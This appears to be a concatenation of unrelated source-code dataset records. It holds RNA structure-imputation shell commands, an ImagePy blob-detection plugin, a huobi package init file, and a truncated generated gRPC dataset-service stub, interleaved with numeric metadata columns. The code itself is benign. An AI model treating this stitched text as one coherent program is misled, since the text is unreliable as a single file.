python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_fibroblast_vivo --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_fibroblast_vivo.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_fibroblast_vivo:DMSseq_fibroblast_vitro --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.fibroblast_vitro_vs_vivo.pdf
# d10
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_K562_vitro --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.K562_vivo_vs_vitro.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_fibroblast_vivo --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.vivo_K562_vs_fibroblast.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d10_DMSseq_K562_vivo_trainRandmask0.3x10_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vivo:DMSseq_K562_vitro --savefn /home/gongjing/project/shape_imputation/results/d10.randomnull0.3.condition_compare_correlation.track.vitro_K562_vs_fibroblast.pdf
'''
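A standalone sketch of the per-window correlation computed for the 'corr' column in compare_predict above; the reactivity strings below are made-up values, and scipy.stats.pearsonr returns an (r, p-value) pair:

from scipy import stats

def window_corr(shape_a, shape_b):
    # Each fragment_shape field is a comma-separated string of float reactivities.
    a = list(map(float, shape_a.split(',')))
    b = list(map(float, shape_b.split(',')))
    return stats.pearsonr(a, b)[0]

print(window_corr('0.1,0.9,0.3,0.5', '0.2,0.8,0.4,0.6'))  # ~0.98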
| 130.64878
| 975
| 0.82403
| 3,823
| 26,783
| 5.436307
| 0.069056
| 0.05774
| 0.091421
| 0.115479
| 0.883318
| 0.868979
| 0.85185
| 0.843526
| 0.835491
| 0.831641
| 0
| 0.059569
| 0.057312
| 26,783
| 205
| 976
| 130.64878
| 0.763585
| 0.052496
| 0
| 0.223141
| 0
| 0.016529
| 0.194723
| 0.066925
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024793
| false
| 0
| 0.157025
| 0
| 0.190083
| 0.041322
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 905e73b142c5378a5b79189c0c81b763097450ca
| 149
| py
| Python
| hb_quant/huobi/constant/__init__.py
| wenli135/Binance-volatility-trading-bot
| 75a03ad61df0e95492128fb6f1f419d4dc256ab3
| ["MIT"] | 611
| 2019-07-10T08:17:50.000Z
| 2022-03-21T18:56:39.000Z
| hb_quant/huobi/constant/__init__.py
| wenli135/Binance-volatility-trading-bot
| 75a03ad61df0e95492128fb6f1f419d4dc256ab3
| ["MIT"] | 105
| 2019-07-12T03:43:41.000Z
| 2022-03-30T10:33:06.000Z
| hb_quant/huobi/constant/__init__.py
| wenli135/Binance-volatility-trading-bot
| 75a03ad61df0e95492128fb6f1f419d4dc256ab3
| ["MIT"] | 325
| 2019-07-12T02:46:54.000Z
| 2022-03-21T18:56:41.000Z
|
from huobi.constant.definition import *
from huobi.constant.result import *
from huobi.constant.system import *
from huobi.constant.test import *
| 18.625
| 39
| 0.791946
| 20
| 149
| 5.9
| 0.4
| 0.305085
| 0.576271
| 0.584746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127517
| 149
| 7
| 40
| 21.285714
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 8
| 9072ebd509b3ec8099f763646c2bfde9709c9c96
| 7,700
| py
| Python
| imagepy/menus/Process/Features/blob_plgs.py
| CsatiZoltan/imagepy
| df44caef2822f2c543b9fa4ef6132a7b1014623e
| ["BSD-4-Clause"] | 1
| 2020-05-16T12:30:30.000Z
| 2020-05-16T12:30:30.000Z
| imagepy/menus/Process/Features/blob_plgs.py
| HeLiangHIT/imagepy
| 9a60ad3b1e8f79f2dcc47e4f246a4f31a96f99f5
| ["BSD-4-Clause"] | null | null | null
| imagepy/menus/Process/Features/blob_plgs.py
| HeLiangHIT/imagepy
| 9a60ad3b1e8f79f2dcc47e4f246a4f31a96f99f5
| ["BSD-4-Clause"] | null | null | null |
from imagepy import IPy
import numpy as np
from imagepy.core.engine import Simple
from skimage.feature import blob_dog, blob_doh, blob_log
from imagepy.core.mark import GeometryMark
import pandas as pd
class Dog(Simple):
title = 'Blob Dog'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':50, 'sigma_ratio':1.6, 'threshold':0.1,
'overlap':0.5, 'exclude_border':False, 'showid':True, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(float, 'sigma_ratio', (1.3, 5), 1, 'ratio', '1.3~5'),
(float, 'threshold', (0.1, 10), 1, 'threshold', '0.1~10'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'exclude_border', 'exclude border'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_dog(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
sigma_ratio=para['sigma_ratio'], threshold=para['threshold'],
overlap=para['overlap'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_dog(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
sigma_ratio=para['sigma_ratio'], threshold=para['threshold'],
overlap=para['overlap'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
        if para['slice']: df.insert(0, 'SliceID', sid)
IPy.show_table(df, ips.title+'-dogblob')
class Doh(Simple):
title = 'Blob Doh'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':30, 'num_sigma':10, 'threshold':0.01,
'overlap':0.5, 'log_scale':False, 'showid':True, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(int, 'num_sigma', (5, 30), 0, 'num', 'sigma'),
(float, 'threshold', (0.01, 1), 2, 'threshold', '0.1~10'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'log_scale', 'log scale'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_doh(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'])
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_doh(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'])
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
        if para['slice']: df.insert(0, 'SliceID', sid)
IPy.show_table(df, ips.title+'-dohblob')
class Log(Simple):
title = 'Blob Log'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':30, 'num_sigma':10, 'threshold':0.1, 'overlap':0.5,
'log_scale':False, 'showid':True, 'exclude_border':False, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(int, 'num_sigma', (5, 30), 0, 'num', 'sigma'),
(float, 'threshold', (0.01, 1), 2, 'threshold', '0.02~1'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'log_scale', 'log scale'),
(bool, 'exclude_border', 'exclude border'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_log(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_log(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
        if para['slice']: df.insert(0, 'SliceID', sid)
        IPy.show_table(df, ips.title+'-logblob')
plgs = [Dog, Doh, Log]
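A standalone sketch of the detection step the three plugins wrap; the synthetic image below is an assumption, and since blob_log returns rows of (y, x, sigma), the plugins multiply sigma by sqrt(2) to approximate the blob radius:

import numpy as np
from skimage.feature import blob_log

# Synthetic test image: one Gaussian-shaped bright blob on a dark background.
img = np.zeros((64, 64))
yy, xx = np.mgrid[:64, :64]
img += np.exp(-((yy - 32) ** 2 + (xx - 32) ** 2) / (2 * 5.0 ** 2))

pts = blob_log(img, min_sigma=1, max_sigma=10, num_sigma=10, threshold=0.1)
pts[:, 2] *= np.sqrt(2)  # sigma -> approximate radius, as in the plugins above
print(pts)  # rows of (y, x, r)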
| 45.294118
| 108
| 0.527922
| 1,043
| 7,700
| 3.811122
| 0.104506
| 0.042264
| 0.02717
| 0.013585
| 0.909434
| 0.909434
| 0.904151
| 0.904151
| 0.891824
| 0.883019
| 0
| 0.028322
| 0.257143
| 7,700
| 170
| 109
| 45.294118
| 0.666608
| 0
| 0
| 0.829787
| 0
| 0
| 0.186599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.042553
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 90a1b5c698734d7d439815de91772a44270da425
| 35,108
| py
| Python
| lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
| metaprov/modelaapi
| 64ab493dd73329196235e15776e5177c72281990
| ["Apache-2.0"] | 5
| 2022-02-18T03:40:10.000Z
| 2022-03-01T16:11:24.000Z
| lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
| metaprov/modelaapi
| 64ab493dd73329196235e15776e5177c72281990
| ["Apache-2.0"] | 1
| 2022-01-07T19:59:25.000Z
| 2022-02-04T01:21:14.000Z
| lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
| metaprov/modelaapi
| 64ab493dd73329196235e15776e5177c72281990
| ["Apache-2.0"] | 1
| 2022-03-25T10:21:43.000Z
| 2022-03-25T10:21:43.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from github.com.metaprov.modelaapi.services.dataset.v1 import dataset_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2
class DatasetServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListDatasets = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ListDatasets',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.FromString,
)
self.GetDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.FromString,
)
self.CreateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.FromString,
)
self.UpdateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UpdateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.FromString,
)
self.DeleteDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DeleteDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.FromString,
)
self.CompareDatasets = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CompareDatasets',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.FromString,
)
self.GetDatasetProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatasetProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.FromString,
)
self.CreateDatasetProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDatasetProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.FromString,
)
self.CreateColumnProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateColumnProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.FromString,
)
self.GenerateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GenerateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.FromString,
)
self.ValidateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ValidateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.FromString,
)
self.UploadChunk = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UploadChunk',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.FromString,
)
self.DownloadDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DownloadDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.FromString,
)
self.GetDatabases = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatabases',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.FromString,
)
self.GetTables = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetTables',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.FromString,
)
self.ExecuteSql = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ExecuteSql',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.FromString,
)
class DatasetServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def ListDatasets(self, request, context):
"""Datasets
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CompareDatasets(self, request, context):
"""compare one or more datasets
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDatasetProfile(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDatasetProfile(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateColumnProfile(self, request, context):
"""Get a single column viz, we do that since we want to parallelize the computation of the viz
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateDataset(self, request, context):
"""generate a syntatic dataset
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ValidateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UploadChunk(self, request, context):
"""option (google.api.http).post = "/v1/datasets/{namespace}/{name}:upload";
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DownloadDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDatabases(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTables(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ExecuteSql(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DatasetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ListDatasets': grpc.unary_unary_rpc_method_handler(
servicer.ListDatasets,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.SerializeToString,
),
'GetDataset': grpc.unary_unary_rpc_method_handler(
servicer.GetDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.SerializeToString,
),
'CreateDataset': grpc.unary_unary_rpc_method_handler(
servicer.CreateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.SerializeToString,
),
'UpdateDataset': grpc.unary_unary_rpc_method_handler(
